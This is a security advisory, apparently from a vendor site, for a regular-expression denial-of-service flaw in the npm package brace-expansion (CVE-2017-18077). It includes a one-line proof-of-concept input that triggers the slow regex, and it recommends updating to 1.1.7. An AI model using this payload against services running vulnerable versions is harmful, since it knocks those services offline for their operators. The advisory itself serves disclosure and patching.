Launch Week Day 1: Announcing Security Design Review
HIGH 7.5 npm

ReDoS in brace-expansion

GHSA-832h-xg76-4gv6 · CVE-2017-18077

Published · Modified

Description

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation

Update to version 1.1.7 or later.

Ready to move

Start Securing

Free, no credit card | First findings in minutes